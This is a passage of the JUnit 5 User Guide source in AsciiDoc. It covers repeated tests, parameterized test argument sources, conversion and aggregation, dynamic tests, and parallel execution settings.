8 of 10 for repeatedTest\nINFO: About to execute repetition 9 of 10 for repeatedTest\nINFO: About to execute repetition 10 of 10 for repeatedTest\nINFO: About to execute repetition 1 of 5 for repeatedTestWithRepetitionInfo\nINFO: About to execute repetition 2 of 5 for repeatedTestWithRepetitionInfo\nINFO: About to execute repetition 3 of 5 for repeatedTestWithRepetitionInfo\nINFO: About to execute repetition 4 of 5 for repeatedTestWithRepetitionInfo\nINFO: About to execute repetition 5 of 5 for repeatedTestWithRepetitionInfo\nINFO: About to execute repetition 1 of 1 for customDisplayName\nINFO: About to execute repetition 1 of 1 for customDisplayNameWithLongPattern\nINFO: About to execute repetition 1 of 5 for repeatedTestInGerman\nINFO: About to execute repetition 2 of 5 for repeatedTestInGerman\nINFO: About to execute repetition 3 of 5 for repeatedTestInGerman\nINFO: About to execute repetition 4 of 5 for repeatedTestInGerman\nINFO: About to execute repetition 5 of 5 for repeatedTestInGerman\n....\n\n[source,java]\n----\ninclude::{testDir}\/example\/RepeatedTestsDemo.java[tags=user_guide]\n----\n\nWhen using the `ConsoleLauncher` with the unicode theme enabled, execution of\n`RepeatedTestsDemo` results in the following output to the console.\n\n....\n\u251c\u2500 RepeatedTestsDemo \u2714\n\u2502 \u251c\u2500 repeatedTest() \u2714\n\u2502 \u2502 \u251c\u2500 repetition 1 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 2 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 3 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 4 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 5 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 6 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 7 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 8 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 9 of 10 \u2714\n\u2502 \u2502 \u2514\u2500 repetition 10 of 10 \u2714\n\u2502 \u251c\u2500 repeatedTestWithRepetitionInfo(RepetitionInfo) \u2714\n\u2502 \u2502 \u251c\u2500 repetition 1 of 5 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 2 of 5 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 3 of 5 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 4 of 5 \u2714\n\u2502 \u2502 \u2514\u2500 repetition 5 of 5 \u2714\n\u2502 \u251c\u2500 Repeat! \u2714\n\u2502 \u2502 \u2514\u2500 Repeat! 1\/1 \u2714\n\u2502 \u251c\u2500 Details... \u2714\n\u2502 \u2502 \u2514\u2500 Details... :: repetition 1 of 1 \u2714\n\u2502 \u2514\u2500 repeatedTestInGerman() \u2714\n\u2502 \u251c\u2500 Wiederholung 1 von 5 \u2714\n\u2502 \u251c\u2500 Wiederholung 2 von 5 \u2714\n\u2502 \u251c\u2500 Wiederholung 3 von 5 \u2714\n\u2502 \u251c\u2500 Wiederholung 4 von 5 \u2714\n\u2502 \u2514\u2500 Wiederholung 5 von 5 \u2714\n....\n\n\n[[writing-tests-parameterized-tests]]\n=== Parameterized Tests\n\nParameterized tests make it possible to run a test multiple times with different\narguments. They are declared just like regular `@Test` methods but use the\n`{ParameterizedTest}` annotation instead. In addition, you must declare at least one\n_source_ that will provide the arguments for each invocation and then _consume_ the\narguments in the test method.\n\nThe following example demonstrates a parameterized test that uses the `@ValueSource`\nannotation to specify a `String` array as the source of arguments.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=first_example]\n----\n\nWhen executing the above parameterized test method, each invocation will be reported\nseparately. For instance, the `ConsoleLauncher` will print output similar to the\nfollowing.\n\n....\npalindromes(String) \u2714\n\u251c\u2500 [1] racecar \u2714\n\u251c\u2500 [2] radar \u2714\n\u2514\u2500 [3] able was I ere I saw elba \u2714\n....\n\nWARNING: Parameterized tests are currently an _experimental_ feature. Consult the table\nin <<api-evolution-experimental-apis>> for details.\n\n[[writing-tests-parameterized-tests-setup]]\n==== Required Setup\n\nIn order to use parameterized tests you need to add a dependency on the\n`junit-jupiter-params` artifact. Please refer to <<dependency-metadata>> for details.\n\n[[writing-tests-parameterized-tests-consuming-arguments]]\n==== Consuming Arguments\n\nParameterized test methods typically _consume_ arguments directly from the configured\nsource (see <<writing-tests-parameterized-tests-sources>>) following a one-to-one\ncorrelation between argument source index and method parameter index (see examples in\n<<writing-tests-parameterized-tests-sources-CsvSource>>). However, a parameterized test\nmethod may also choose to _aggregate_ arguments from the source into a single object\npassed to the method (see <<writing-tests-parameterized-tests-argument-aggregation>>).\nAdditional arguments may also be provided by a `ParameterResolver` (e.g., to obtain an\ninstance of `TestInfo`, `TestReporter`, etc.). Specifically, a parameterized test method\nmust declare formal parameters according to the following rules.\n\n* Zero or more _indexed arguments_ must be declared first.\n* Zero or more _aggregators_ must be declared next.\n* Zero or more arguments supplied by a `ParameterResolver` must be declared last.\n\nIn this context, an _indexed argument_ is an argument for a given index in the\n`Arguments` provided by an `ArgumentsProvider` that is passed as an argument to the\nparameterized method at the same index in the method's formal parameter list. An\n_aggregator_ is any parameter of type `ArgumentsAccessor` or any parameter annotated with\n`@AggregateWith`.\n\n[[writing-tests-parameterized-tests-sources]]\n==== Sources of Arguments\n\nOut of the box, JUnit Jupiter provides quite a few _source_ annotations. Each of the\nfollowing subsections provides a brief overview and an example for each of them. Please\nrefer to the Javadoc in the `{params-provider-package}` package for additional\ninformation.\n\n[[writing-tests-parameterized-tests-sources-ValueSource]]\n===== @ValueSource\n\n`@ValueSource` is one of the simplest possible sources. It lets you specify a single\narray of literal values and can only be used for providing a single argument per\nparameterized test invocation.\n\nThe following types of literal values are supported by `@ValueSource`.\n\n- `short`\n- `byte`\n- `int`\n- `long`\n- `float`\n- `double`\n- `char`\n- `java.lang.String`\n- `java.lang.Class`\n\nFor example, the following `@ParameterizedTest` method will be invoked three times, with\nthe values `1`, `2`, and `3` respectively.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=ValueSource_example]\n----\n\n[[writing-tests-parameterized-tests-sources-EnumSource]]\n===== @EnumSource\n\n`@EnumSource` provides a convenient way to use `Enum` constants. The annotation provides\nan optional `names` parameter that lets you specify which constants shall be used. If\nomitted, all constants will be used like in the following example.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=EnumSource_example]\n----\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=EnumSource_include_example]\n----\n\nThe `@EnumSource` annotation also provides an optional `mode` parameter that enables\nfine-grained control over which constants are passed to the test method. For example, you\ncan exclude names from the enum constant pool or specify regular expressions as in the\nfollowing examples.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=EnumSource_exclude_example]\n----\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=EnumSource_regex_example]\n----\n\n[[writing-tests-parameterized-tests-sources-MethodSource]]\n===== @MethodSource\n\n`{MethodSource}` allows you to refer to one or more _factory_ methods of the test class\nor external classes.\n\nFactory methods within the test class must be `static` unless the test class is annotated\nwith `@TestInstance(Lifecycle.PER_CLASS)`; whereas, factory methods in external classes\nmust always be `static`. In addition, such factory methods must not accept any arguments.\n\nEach factory method must generate a _stream_ of _arguments_, and each set of arguments\nwithin the stream will be provided as the physical arguments for individual invocations\nof the annotated `@ParameterizedTest` method. Generally speaking this translates to a\n`Stream` of `Arguments` (i.e., `Stream<Arguments>`); however, the actual concrete return\ntype can take on many forms. In this context, a \"stream\" is anything that JUnit can\nreliably convert into a `Stream`, such as `Stream`, `DoubleStream`, `LongStream`,\n`IntStream`, `Collection`, `Iterator`, `Iterable`, an array of objects, or an array of\nprimitives. The \"arguments\" within the stream can be supplied as an instance of\n`Arguments`, an array of objects (e.g., `Object[]`), or a single value if the\nparameterized test method accepts a single argument.\n\nIf you only need a single parameter, you can return a `Stream` of instances of the\nparameter type as demonstrated in the following example.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=simple_MethodSource_example]\n----\n\nIf you do not explicitly provide a factory method name via `@MethodSource`, JUnit Jupiter\nwill search for a _factory_ method that has the same name as the current\n`@ParameterizedTest` method by convention. This is demonstrated in the following example.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=simple_MethodSource_without_value_example]\n----\n\nStreams for primitive types (`DoubleStream`, `IntStream`, and `LongStream`) are also\nsupported as demonstrated by the following example.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=primitive_MethodSource_example]\n----\n\nIf a parameterized test method declares multiple parameters, you need to return a\ncollection, stream, or array of `Arguments` instances or object arrays as shown below\n(see the Javadoc for `{MethodSource}` for further details on supported return types).\nNote that `arguments(Object...)` is a static factory method defined in the `Arguments`\ninterface. In addition, `Arguments.of(Object...)` may be used as an alternative to\n`arguments(Object...)`.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=multi_arg_MethodSource_example]\n----\n\nAn external, `static` _factory_ method can be referenced by providing its _fully\nqualified method name_ as demonstrated in the following example.\n\n[source,java,indent=0]\n----\npackage example;\n\ninclude::{testDir}\/example\/ExternalMethodSourceDemo.java[tags=external_MethodSource_example]\n----\n\n[[writing-tests-parameterized-tests-sources-CsvSource]]\n===== @CsvSource\n\n`@CsvSource` allows you to express argument lists as comma-separated values (i.e.,\n`String` literals).\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=CsvSource_example]\n----\n\n`@CsvSource` uses a single quote `'` as its quote character. See the `'baz, qux'` value\nin the example above and in the table below. An empty, quoted value `''` results in an\nempty `String`; whereas, an entirely _empty_ value is interpreted as a `null` reference.\nAn `ArgumentConversionException` is raised if the target type of a `null` reference is a\nprimitive type.\n\n[cols=\"50,50\"]\n|===\n| Example Input | Resulting Argument List\n\n| `@CsvSource({ \"foo, bar\" })` | `\"foo\"`, `\"bar\"`\n| `@CsvSource({ \"foo, 'baz, qux'\" })` | `\"foo\"`, `\"baz, qux\"`\n| `@CsvSource({ \"foo, ''\" })` | `\"foo\"`, `\"\"`\n| `@CsvSource({ \"foo, \" })` | `\"foo\"`, `null`\n|===\n\n[[writing-tests-parameterized-tests-sources-CsvFileSource]]\n===== @CsvFileSource\n\n`@CsvFileSource` lets you use CSV files from the classpath. Each line from a CSV file\nresults in one invocation of the parameterized test.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=CsvFileSource_example]\n----\n\n[source,csv,indent=0]\n.two-column.csv\n----\ninclude::{testResourcesDir}\/two-column.csv[]\n----\n\nNOTE: In contrast to the syntax used in `@CsvSource`, `@CsvFileSource` uses a double\nquote `\"` as the quote character. See the `\"United States of America\"` value in the\nexample above. An empty, quoted value `\"\"` results in an empty `String`; whereas, an\nentirely _empty_ value is interpreted as a `null` reference. An\n`ArgumentConversionException` is raised if the target type of a `null` reference is a\nprimitive type.\n\n[[writing-tests-parameterized-tests-sources-ArgumentsSource]]\n===== @ArgumentsSource\n\n`@ArgumentsSource` can be used to specify a custom, reusable `ArgumentsProvider`. Note\nthat an implementation of `ArgumentsProvider` must be declared as either a top-level\nclass or as a `static` nested class.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=ArgumentsSource_example]\n----\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=ArgumentsProvider_example]\n----\n\n\n[[writing-tests-parameterized-tests-argument-conversion]]\n==== Argument Conversion\n\n[[writing-tests-parameterized-tests-argument-conversion-widening]]\n===== Widening Conversion\n\nJUnit Jupiter supports\nhttps:\/\/docs.oracle.com\/javase\/specs\/jls\/se8\/html\/jls-5.html#jls-5.1.2[Widening Primitive\nConversion] for arguments supplied to a `@ParameterizedTest`. For example, a\nparameterized test annotated with `@ValueSource(ints = { 1, 2, 3 })` can be declared to\naccept not only an argument of type `int` but also an argument of type `long`, `float`,\nor `double`.\n\n[[writing-tests-parameterized-tests-argument-conversion-implicit]]\n===== Implicit Conversion\n\nTo support use cases like `@CsvSource`, JUnit Jupiter provides a number of built-in\nimplicit type converters. The conversion process depends on the declared type of each\nmethod parameter.\n\nFor example, if a `@ParameterizedTest` declares a parameter of type `TimeUnit` and the\nactual type supplied by the declared source is a `String`, the string will be\nautomatically converted into the corresponding `TimeUnit` enum constant.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=implicit_conversion_example]\n----\n\n`String` instances are implicitly converted to the following target types.\n\nNOTE: Decimal, hexadecimal, and octal `String` literals will be converted to their\nintegral types: `byte`, `short`, `int`, `long`, and their boxed counterparts.\n\n[[writing-tests-parameterized-tests-argument-conversion-implicit-table]]\n[cols=\"10,90\"]\n|===\n| Target Type | Example\n\n| `boolean`\/`Boolean` | `\"true\"` -> `true`\n| `byte`\/`Byte` | `\"15\"`, `\"0xF\"`, or `\"017\"` -> `(byte) 15`\n| `char`\/`Character` | `\"o\"` -> `'o'`\n| `short`\/`Short` | `\"15\"`, `\"0xF\"`, or `\"017\"` -> `(short) 15`\n| `int`\/`Integer` | `\"15\"`, `\"0xF\"`, or `\"017\"` -> `15`\n| `long`\/`Long` | `\"15\"`, `\"0xF\"`, or `\"017\"` -> `15L`\n| `float`\/`Float` | `\"1.0\"` -> `1.0f`\n| `double`\/`Double` | `\"1.0\"` -> `1.0d`\n| `Enum` subclass | `\"SECONDS\"` -> `TimeUnit.SECONDS`\n| `java.io.File` | `\"\/path\/to\/file\"` -> `new File(\"\/path\/to\/file\")`\n| `java.lang.Class` | `\"java.lang.Integer\"` -> `java.lang.Integer.class` _(use `$` for nested classes, e.g. `\"java.lang.Thread$State\"`)_\n| `java.lang.Class` | `\"byte\"` -> `byte.class` _(primitive types are supported)_\n| `java.lang.Class` | `\"char[]\"` -> `char[].class` _(array types are supported)_\n| `java.math.BigDecimal` | `\"123.456e789\"` -> `new BigDecimal(\"123.456e789\")`\n| `java.math.BigInteger` | `\"1234567890123456789\"` -> `new BigInteger(\"1234567890123456789\")`\n| `java.net.URI` | `\"http:\/\/junit.org\/\"` -> `URI.create(\"http:\/\/junit.org\/\")`\n| `java.net.URL` | `\"http:\/\/junit.org\/\"` -> `new URL(\"http:\/\/junit.org\/\")`\n| `java.nio.charset.Charset` | `\"UTF-8\"` -> `Charset.forName(\"UTF-8\")`\n| `java.nio.file.Path` | `\"\/path\/to\/file\"` -> `Paths.get(\"\/path\/to\/file\")`\n| `java.time.Instant` | `\"1970-01-01T00:00:00Z\"` -> `Instant.ofEpochMilli(0)`\n| `java.time.LocalDateTime` | `\"2017-03-14T12:34:56.789\"` -> `LocalDateTime.of(2017, 3, 14, 12, 34, 56, 789_000_000)`\n| `java.time.LocalDate` | `\"2017-03-14\"` -> `LocalDate.of(2017, 3, 14)`\n| `java.time.LocalTime` | `\"12:34:56.789\"` -> `LocalTime.of(12, 34, 56, 789_000_000)`\n| `java.time.OffsetDateTime` | `\"2017-03-14T12:34:56.789Z\"` -> `OffsetDateTime.of(2017, 3, 14, 12, 34, 56, 789_000_000, ZoneOffset.UTC)`\n| `java.time.OffsetTime` | `\"12:34:56.789Z\"` -> `OffsetTime.of(12, 34, 56, 789_000_000, ZoneOffset.UTC)`\n| `java.time.YearMonth` | `\"2017-03\"` -> `YearMonth.of(2017, 3)`\n| `java.time.Year` | `\"2017\"` -> `Year.of(2017)`\n| `java.time.ZonedDateTime` | `\"2017-03-14T12:34:56.789Z\"` -> `ZonedDateTime.of(2017, 3, 14, 12, 34, 56, 789_000_000, ZoneOffset.UTC)`\n| `java.util.Currency` | `\"JPY\"` -> `Currency.getInstance(\"JPY\")`\n| `java.util.Locale` | `\"en\"` -> `new Locale(\"en\")`\n| `java.util.UUID` | `\"d043e930-7b3b-48e3-bdbe-5a3ccfb833db\"` -> `UUID.fromString(\"d043e930-7b3b-48e3-bdbe-5a3ccfb833db\")`\n|===\n\n[[writing-tests-parameterized-tests-argument-conversion-implicit-fallback]]\n====== Fallback String-to-Object Conversion\n\nIn addition to implicit conversion from strings to the target types listed in the above\ntable, JUnit Jupiter also provides a fallback mechanism for automatic conversion from a\n`String` to a given target type if the target type declares exactly one suitable _factory\nmethod_ or a _factory constructor_ as defined below.\n\n- __factory method__: a non-private, `static` method declared in the target type that\n accepts a single `String` argument and returns an instance of the target type. The name\n of the method can be arbitrary and need not follow any particular convention.\n- __factory constructor__: a non-private constructor in the target type that accepts a\n single `String` argument. Note that the target type must be declared as either a\n top-level class or as a `static` nested class.\n\nNOTE: If multiple _factory methods_ are discovered, they will be ignored. If a _factory\nmethod_ and a _factory constructor_ are discovered, the factory method will be used\ninstead of the constructor.\n\nFor example, in the following `@ParameterizedTest` method, the `Book` argument will be\ncreated by invoking the `Book.fromTitle(String)` factory method and passing `\"42 Cats\"`\nas the title of the book.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=implicit_fallback_conversion_example]\n----\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=implicit_fallback_conversion_example_Book]\n----\n\n[[writing-tests-parameterized-tests-argument-conversion-explicit]]\n===== Explicit Conversion\n\nInstead of relying on implicit argument conversion you may explicitly specify an\n`ArgumentConverter` to use for a certain parameter using the `@ConvertWith` annotation\nlike in the following example. Note that an implementation of `ArgumentConverter` must be\ndeclared as either a top-level class or as a `static` nested class.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=explicit_conversion_example]\n----\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=explicit_conversion_example_ToStringArgumentConverter]\n----\n\nExplicit argument converters are meant to be implemented by test and extension authors.\nThus, `junit-jupiter-params` only provides a single explicit argument converter that may\nalso serve as a reference implementation: `JavaTimeArgumentConverter`. It is used via the\ncomposed annotation `JavaTimeConversionPattern`.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=explicit_java_time_converter]\n----\n\n[[writing-tests-parameterized-tests-argument-aggregation]]\n==== Argument Aggregation\n\nBy default, each _argument_ provided to a `@ParameterizedTest` method corresponds to a\nsingle method parameter. Consequently, argument sources which are expected to supply a\nlarge number of arguments can lead to large method signatures.\n\nIn such cases, an `{ArgumentsAccessor}` can be used instead of multiple parameters. Using\nthis API, you can access the provided arguments through a single argument passed to your\ntest method. In addition, type conversion is supported as discussed in\n<<writing-tests-parameterized-tests-argument-conversion-implicit>>.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=ArgumentsAccessor_example]\n----\n\n_An instance of `ArgumentsAccessor` is automatically injected into any parameter of type\n`ArgumentsAccessor`._\n\n[[writing-tests-parameterized-tests-argument-aggregation-custom]]\n===== Custom Aggregators\n\nApart from direct access to a `@ParameterizedTest` method's arguments using an\n`ArgumentsAccessor`, JUnit Jupiter also supports the usage of custom, reusable\n_aggregators_.\n\nTo use a custom aggregator, implement the `{ArgumentsAggregator}` interface and register\nit via the `@AggregateWith` annotation on a compatible parameter in the\n`@ParameterizedTest` method. The result of the aggregation will then be provided as an\nargument for the corresponding parameter when the parameterized test is invoked. Note\nthat an implementation of `ArgumentsAggregator` must be declared as either a top-level\nclass or as a `static` nested class.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=ArgumentsAggregator_example]\n----\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=ArgumentsAggregator_example_PersonAggregator]\n----\n\nIf you find yourself repeatedly declaring `@AggregateWith(MyTypeAggregator.class)` for\nmultiple parameterized test methods across your codebase, you may wish to create a custom\n_composed annotation_ such as `@CsvToMyType` that is meta-annotated with\n`@AggregateWith(MyTypeAggregator.class)`. The following example demonstrates this in\naction with a custom `@CsvToPerson` annotation.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=ArgumentsAggregator_with_custom_annotation_example]\n----\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=ArgumentsAggregator_with_custom_annotation_example_CsvToPerson]\n----\n\n\n[[writing-tests-parameterized-tests-display-names]]\n==== Customizing Display Names\n\nBy default, the display name of a parameterized test invocation contains the invocation\nindex and the `String` representation of all arguments for that specific invocation.\nHowever, you can customize invocation display names via the `name` attribute of the\n`@ParameterizedTest` annotation like in the following example.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=custom_display_names]\n----\n\nWhen executing the above method using the `ConsoleLauncher` you will see output similar to the following.\n\n....\nDisplay name of container \u2714\n\u251c\u2500 1 ==> first='foo', second=1 \u2714\n\u251c\u2500 2 ==> first='bar', second=2 \u2714\n\u2514\u2500 3 ==> first='baz, qux', second=3 \u2714\n....\n\nThe following placeholders are supported within custom display names.\n\n[cols=\"20,80\"]\n|===\n| Placeholder | Description\n\n| `{index}` | the current invocation index (1-based)\n| `{arguments}` | the complete, comma-separated arguments list\n| `{0}`, `{1}`, ... | an individual argument\n|===\n\n\n[[writing-tests-parameterized-tests-lifecycle-interop]]\n==== Lifecycle and Interoperability\n\nEach invocation of a parameterized test has the same lifecycle as a regular `@Test`\nmethod. For example, `@BeforeEach` methods will be executed before each invocation.\nSimilar to <<writing-tests-dynamic-tests>>, invocations will appear one by one in the\ntest tree of an IDE. You may at will mix regular `@Test` methods and `@ParameterizedTest`\nmethods within the same test class.\n\nYou may use `ParameterResolver` extensions with `@ParameterizedTest` methods. However,\nmethod parameters that are resolved by argument sources need to come first in the\nargument list. Since a test class may contain regular tests as well as parameterized\ntests with different parameter lists, values from argument sources are not resolved for\nlifecycle methods (e.g. `@BeforeEach`) and test class constructors.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=ParameterResolver_example]\n----\n\n\n[[writing-tests-test-templates]]\n=== Test Templates\n\nA `{TestTemplate}` method is not a regular test case but rather a template for test\ncases. As such, it is designed to be invoked multiple times depending on the number of\ninvocation contexts returned by the registered providers. Thus, it must be used in\nconjunction with a registered `{TestTemplateInvocationContextProvider}` extension. Each\ninvocation of a test template method behaves like the execution of a regular `@Test`\nmethod with full support for the same lifecycle callbacks and extensions. Please refer to\n<<extensions-test-templates>> for usage examples.\n\n\n[[writing-tests-dynamic-tests]]\n=== Dynamic Tests\n\nThe standard `@Test` annotation in JUnit Jupiter described in\n<<writing-tests-annotations>> is very similar to the `@Test` annotation in JUnit 4. Both\ndescribe methods that implement test cases. These test cases are static in the sense that\nthey are fully specified at compile time, and their behavior cannot be changed by\nanything happening at runtime. _Assumptions provide a basic form of dynamic behavior but\nare intentionally rather limited in their expressiveness._\n\nIn addition to these standard tests a completely new kind of test programming model has\nbeen introduced in JUnit Jupiter. This new kind of test is a _dynamic test_ which is\ngenerated at runtime by a factory method that is annotated with `@TestFactory`.\n\nIn contrast to `@Test` methods, a `@TestFactory` method is not itself a test case but\nrather a factory for test cases. Thus, a dynamic test is the product of a factory.\nTechnically speaking, a `@TestFactory` method must return a single `DynamicNode` or a\n`Stream`, `Collection`, `Iterable`, `Iterator`, or array of `DynamicNode` instances.\nInstantiable subclasses of `DynamicNode` are `DynamicContainer` and `DynamicTest`.\n`DynamicContainer` instances are composed of a _display name_ and a list of dynamic child\nnodes, enabling the creation of arbitrarily nested hierarchies of dynamic nodes.\n`DynamicTest` instances will be executed lazily, enabling dynamic and even\nnon-deterministic generation of test cases.\n\nAny `Stream` returned by a `@TestFactory` will be properly closed by calling\n`stream.close()`, making it safe to use a resource such as `Files.lines()`.\n\nAs with `@Test` methods, `@TestFactory` methods must not be `private` or `static` and may\noptionally declare parameters to be resolved by `ParameterResolvers`.\n\nA `DynamicTest` is a test case generated at runtime. It is composed of a _display name_\nand an `Executable`. `Executable` is a `@FunctionalInterface` which means that the\nimplementations of dynamic tests can be provided as _lambda expressions_ or _method\nreferences_.\n\n.Dynamic Test Lifecycle\nWARNING: The execution lifecycle of a dynamic test is quite different than it is for a\nstandard `@Test` case. Specifically, there are no lifecycle callbacks for individual\ndynamic tests. This means that `@BeforeEach` and `@AfterEach` methods and their\ncorresponding extension callbacks are executed for the `@TestFactory` method but not for\neach _dynamic test_. In other words, if you access fields from the test instance within a\nlambda expression for a dynamic test, those fields will not be reset by callback methods\nor extensions between the execution of individual dynamic tests generated by the same\n`@TestFactory` method.\n\nAs of JUnit Jupiter {jupiter-version}, dynamic tests must always be created by factory\nmethods; however, this might be complemented by a registration facility in a later\nrelease.\n\nWARNING: Dynamic tests are currently an _experimental_ feature. Consult the table in\n<<api-evolution-experimental-apis>> for details.\n\n[[writing-tests-dynamic-tests-examples]]\n==== Dynamic Test Examples\n\nThe following `DynamicTestsDemo` class demonstrates several examples of test factories\nand dynamic tests.\n\nThe first method returns an invalid return type. Since an invalid return type cannot be\ndetected at compile time, a `JUnitException` is thrown when it is detected at runtime.\n\nThe next five methods are very simple examples that demonstrate the generation of a\n`Collection`, `Iterable`, `Iterator`, or `Stream` of `DynamicTest` instances. Most of\nthese examples do not really exhibit dynamic behavior but merely demonstrate the\nsupported return types in principle. However, `dynamicTestsFromStream()` and\n`dynamicTestsFromIntStream()` demonstrate how easy it is to generate dynamic tests for a\ngiven set of strings or a range of input numbers.\n\nThe next method is truly dynamic in nature. `generateRandomNumberOfTests()` implements an\n`Iterator` that generates random numbers, a display name generator, and a test executor\nand then provides all three to `DynamicTest.stream()`. Although the non-deterministic\nbehavior of `generateRandomNumberOfTests()` is of course in conflict with test\nrepeatability and should thus be used with care, it serves to demonstrate the\nexpressiveness and power of dynamic tests.\n\nThe last method generates a nested hierarchy of dynamic tests utilizing\n`DynamicContainer`.\n\n[source,java]\n----\ninclude::{testDir}\/example\/DynamicTestsDemo.java[tags=user_guide]\n----\n\n\n[[writing-tests-parallel-execution]]\n=== Parallel Execution\n\n.Parallel test execution is an experimental feature\nWARNING: You're invited to give it a try and provide feedback to the JUnit team so they\ncan improve and eventually <<api-evolution, promote>> this feature.\n\nBy default, JUnit Jupiter tests are run sequentially in a single thread. Running tests in\nparallel -- for example, to speed up execution -- is available as an opt-in feature since\nversion 5.3. To enable parallel execution, set the\n`junit.jupiter.execution.parallel.enabled` configuration parameter to `true` -- for\nexample, in `junit-platform.properties` (see <<running-tests-config-params>> for other\noptions).\n\nPlease note that enabling this property is only the first step required to execute tests\nin parallel. If enabled, test classes and methods will still be executed sequentially by\ndefault. Whether or not a node in the test tree is executed concurrently is controlled by\nits execution mode. The following two modes are available.\n\n`SAME_THREAD`::\n Force execution in the same thread used by the parent. For example, when used on a test\n method, the test method will be executed in the same thread as any `@BeforeAll` or\n `@AfterAll` methods of the containing test class.\n\n`CONCURRENT`::\n Execute concurrently unless a resource lock forces execution in the same thread.\n\nBy default, nodes in the test tree use the `SAME_THREAD` execution mode. You can change\nthe default by setting the `junit.jupiter.execution.parallel.mode.default` configuration\nparameter. Alternatively, you can use the `{Execution}` annotation to change the\nexecution mode for the annotated element and its subelements (if any) which allows you to\nactivate parallel execution for individual test classes, one by one.\n\n[source,properties]\n.Configuration parameters to execute all tests in parallel\n----\njunit.jupiter.execution.parallel.enabled = true\njunit.jupiter.execution.parallel.mode.default = concurrent\n----\n\nThe default execution mode is applied to all nodes of the test tree with a few notable\nexceptions, namely test classes that use the `Lifecycle.PER_CLASS` mode or a\n`{MethodOrderer}` (except for `{Random}`). In the former case, test authors have to\nensure that the test class is thread-safe; in the latter, concurrent execution might\nconflict with the configured execution order. Thus, in both cases, test methods in such\ntest classes are only executed concurrently if the `@Execution(CONCURRENT)` annotation is\npresent on the test class or method.\n\nAll nodes of the test tree that are configured with the `CONCURRENT` execution mode will\nbe executed fully in parallel according to the provided\n<<writing-tests-parallel-execution-config, configuration>> while observing the\ndeclarative <<writing-tests-parallel-execution-synchronization, synchronization>>\nmechanism. Please note that <<running-tests-capturing-output>> needs to be enabled\nseparately.\n\n[[writing-tests-parallel-execution-config]]\n==== Configuration\n\nProperties such as the desired parallelism and the maximum pool size can be configured\nusing a `{ParallelExecutionConfigurationStrategy}`. The JUnit Platform provides two\nimplementations out of the box: `dynamic` and `fixed`. Alternatively, you may implement a\n`custom` strategy.\n\nTo select a strategy, set the `junit.jupiter.execution.parallel.config.strategy`\nconfiguration parameter to one of the following options.\n\n`dynamic`::\n Computes the desired parallelism based on the number of available processors\/cores\n multiplied by the `junit.jupiter.execution.parallel.config.dynamic.factor`\n configuration parameter (defaults to `1`).\n\n`fixed`::\n Uses the mandatory `junit.jupiter.execution.parallel.config.fixed.parallelism`\n configuration parameter as the desired parallelism.\n\n`custom`::\n Allows you to specify a custom `{ParallelExecutionConfigurationStrategy}`\n implementation via the mandatory `junit.jupiter.execution.parallel.config.custom.class`\n configuration parameter to determine the desired configuration.\n\nIf no configuration strategy is set, JUnit Jupiter uses the `dynamic` configuration\nstrategy with a factor of `1`. Consequently, the desired parallelism will be equal to the\nnumber of available processors\/cores.\n\n.Parallelism does not imply maximum number of concurrent threads\nNOTE: JUnit Jupiter does not guarantee that the number of concurrently executing tests\nwill not exceed the configured parallelism. For example, when using one of the\nsynchronization mechanisms described in the next section, the `ForkJoinPool` that is used\nbehind the scenes may spawn additional threads to ensure execution continues with\nsufficient parallelism. Thus, if you require such guarantees in a test class, please use\nyour own means of controlling concurrency.\n\n[[writing-tests-parallel-execution-synchronization]]\n==== 